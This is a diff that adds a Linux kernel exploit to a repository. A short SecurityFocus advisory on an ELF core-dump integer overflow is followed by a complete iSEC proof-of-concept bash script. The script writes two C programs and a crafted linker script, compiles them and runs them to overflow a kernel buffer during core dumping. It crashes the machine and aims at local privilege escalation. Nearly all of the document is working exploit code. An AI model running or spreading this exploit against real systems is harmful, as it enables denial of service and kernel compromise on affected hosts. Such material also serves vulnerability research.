|
| 1 | +/* |
| 2 | +source: http://www.securityfocus.com/bid/13589/info |
| 3 | + |
| 4 | +The Linux kernel is susceptible to a local buffer-overflow vulnerability when attempting to create ELF coredumps. This issue is due to an integer-overflow flaw that results in a kernel buffer overflow during a 'copy_from_user()' call. |
| 5 | + |
| 6 | +To exploit this vulnerability, a malicious user creates a malicious ELF executable designed to create a negative 'len' variable in 'elf_core_dump()'. |
| 7 | + |
| 8 | +Local users may exploit this vulnerability to execute arbitrary machine code in the context of the kernel, facilitating privilege escalation. |
| 9 | + |
| 10 | +**Update: This vulnerability does not exist in the 2.6 kernel tree. |
| 11 | +*/ |
| 12 | + |
| 13 | +#!/bin/bash |
| 14 | +# |
| 15 | +# elfcd.sh |
| 16 | +# warning: This code will crash your machine |
| 17 | +# |
| 18 | +cat <<__EOF__>elfcd1.c |
| 19 | +/* |
| 20 | + * Linux binfmt_elf core dump buffer overflow |
| 21 | + * |
| 22 | + * Copyright (c) 2005 iSEC Security Research. All Rights Reserved. |
| 23 | + * |
| 24 | + * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" |
| 25 | + * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION |
| 26 | + * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. |
| 27 | + * |
| 28 | + */ |
| 29 | +// phase 1 |
| 30 | +#include <stdio.h> |
| 31 | +#include <stdlib.h> |
| 32 | +#include <errno.h> |
| 33 | +#include <unistd.h> |
| 34 | + |
| 35 | +#include <sys/time.h> |
| 36 | +#include <sys/resource.h> |
| 37 | + |
| 38 | +#include <asm/page.h> |
| 39 | + |
| 40 | + |
| 41 | +static char *env[10], *argv[4]; |
| 42 | +static char page[PAGE_SIZE]; |
| 43 | +static char buf[PAGE_SIZE]; |
| 44 | + |
| 45 | + |
| 46 | +void fatal(const char *msg) |
| 47 | +{ |
| 48 | + if(!errno) { |
| 49 | + fprintf(stderr, "\nFATAL: %s\n", msg); |
| 50 | + } |
| 51 | + else { |
| 52 | + printf("\n"); |
| 53 | + perror(msg); |
| 54 | + } |
| 55 | + fflush(stdout); fflush(stderr); |
| 56 | + _exit(129); |
| 57 | +} |
| 58 | + |
| 59 | + |
| 60 | +int main(int ac, char **av) |
| 61 | +{ |
| 62 | +int esp, i, r; |
| 63 | +struct rlimit rl; |
| 64 | + |
| 65 | + __asm__("movl %%esp, %0" : : "m"(esp)); |
| 66 | + printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0], av[ac-1]+strlen(av[ac-1]), esp); |
| 67 | + rl.rlim_cur = RLIM_INFINITY; |
| 68 | + rl.rlim_max = RLIM_INFINITY; |
| 69 | + r = setrlimit(RLIMIT_CORE, &rl); |
| 70 | + if(r) fatal("setrlimit"); |
| 71 | + |
| 72 | + memset(env, 0, sizeof(env) ); |
| 73 | + memset(argv, 0, sizeof(argv) ); |
| 74 | + memset(page, 'A', sizeof(page) ); |
| 75 | + page[PAGE_SIZE-1]=0; |
| 76 | + |
| 77 | +// move up env & exec phase 2 |
| 78 | + if(!strcmp(av[0], "AAAA")) { |
| 79 | + printf("\n[+] phase 2, <RET> to crash "); fflush(stdout); |
| 80 | + argv[0] = "elfcd2"; |
| 81 | + argv[1] = page; |
| 82 | + |
| 83 | +// term 0 counts! |
| 84 | + memset(buf, 0, sizeof(buf) ); |
| 85 | + for(i=0; i<789 + 4; i++) |
| 86 | + buf[i] = 'C'; |
| 87 | + argv[2] = buf; |
| 88 | + execve(argv[0], argv, env); |
| 89 | + _exit(127); |
| 90 | + } |
| 91 | + |
| 92 | +// move down env & reexec |
| 93 | + for(i=0; i<9; i++) |
| 94 | + env[i] = page; |
| 95 | + |
| 96 | + argv[0] = "AAAA"; |
| 97 | + printf("\n[+] phase 1"); fflush(stdout); |
| 98 | + execve(av[0], argv, env); |
| 99 | + |
| 100 | +return 0; |
| 101 | +} |
| 102 | +__EOF__ |
| 103 | +cat <<__EOF__>elfcd2.c |
| 104 | +// phase 2 |
| 105 | +#include <stdio.h> |
| 106 | +#include <stdlib.h> |
| 107 | +#include <unistd.h> |
| 108 | +#include <syscall.h> |
| 109 | + |
| 110 | +#include <sys/syscall.h> |
| 111 | + |
| 112 | +#include <asm/page.h> |
| 113 | + |
| 114 | +#define __NR_sys_read __NR_read |
| 115 | +#define __NR_sys_kill __NR_kill |
| 116 | +#define __NR_sys_getpid __NR_getpid |
| 117 | + |
| 118 | + |
| 119 | +char stack[4096 * 6]; |
| 120 | +static int errno; |
| 121 | + |
| 122 | + |
| 123 | +inline _syscall3(int, sys_read, int, a, void*, b, int, l); |
| 124 | +inline _syscall2(int, sys_kill, int, c, int, a); |
| 125 | +inline _syscall0(int, sys_getpid); |
| 126 | + |
| 127 | + |
| 128 | +// yeah, lets do it |
| 129 | +void killme() |
| 130 | +{ |
| 131 | +char c='a'; |
| 132 | +int pid; |
| 133 | + |
| 134 | + pid = sys_getpid(); |
| 135 | + for(;;) { |
| 136 | + sys_read(0, &c, 1); |
| 137 | + sys_kill(pid, 11); |
| 138 | + } |
| 139 | +} |
| 140 | + |
| 141 | + |
| 142 | +// safe stack stub |
| 143 | +__asm__( |
| 144 | + " nop \n" |
| 145 | + "_start: movl \$0xbfff6ffc, %esp \n" |
| 146 | + " jmp killme \n" |
| 147 | + ".global _start \n" |
| 148 | +); |
| 149 | +__EOF__ |
| 150 | +cat <<__EOF__>elfcd.ld |
| 151 | +OUTPUT_FORMAT("elf32-i386", "elf32-i386", |
| 152 | + "elf32-i386") |
| 153 | +OUTPUT_ARCH(i386) |
| 154 | +ENTRY(_start) |
| 155 | +SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib); SEARCH_DIR(/usr/i486-suse-linux/lib); |
| 156 | + |
| 157 | +MEMORY |
| 158 | +{ |
| 159 | + ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000 |
| 160 | + rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000 |
| 161 | +} |
| 162 | + |
| 163 | +PHDRS |
| 164 | +{ |
| 165 | + headers PT_PHDR PHDRS ; |
| 166 | + text PT_LOAD FILEHDR PHDRS ; |
| 167 | + fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ; |
| 168 | +} |
| 169 | + |
| 170 | +SECTIONS |
| 171 | +{ |
| 172 | + |
| 173 | + .dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; } >rom :fuckme |
| 174 | + |
| 175 | + . = 0xbfff0000 + SIZEOF_HEADERS; |
| 176 | + .text : { *(.text) } >ram :text |
| 177 | + .data : { *(.data) } >ram :text |
| 178 | + .bss : |
| 179 | + { |
| 180 | + *(.dynbss) |
| 181 | + *(.bss) |
| 182 | + *(.bss.*) |
| 183 | + *(.gnu.linkonce.b.*) |
| 184 | + *(COMMON) |
| 185 | + . = ALIGN(32 / 8); |
| 186 | + } >ram :text |
| 187 | + |
| 188 | +} |
| 189 | +__EOF__ |
| 190 | + |
| 191 | +# compile & run |
| 192 | +echo -n "[+] Compiling..." |
| 193 | +gcc -O2 -Wall elfcd1.c -o elfcd1 |
| 194 | +gcc -O2 -nostdlib elfcd2.c -o elfcd2 -Xlinker -T elfcd.ld -static |
| 195 | +./elfcd1 |
0 commit comments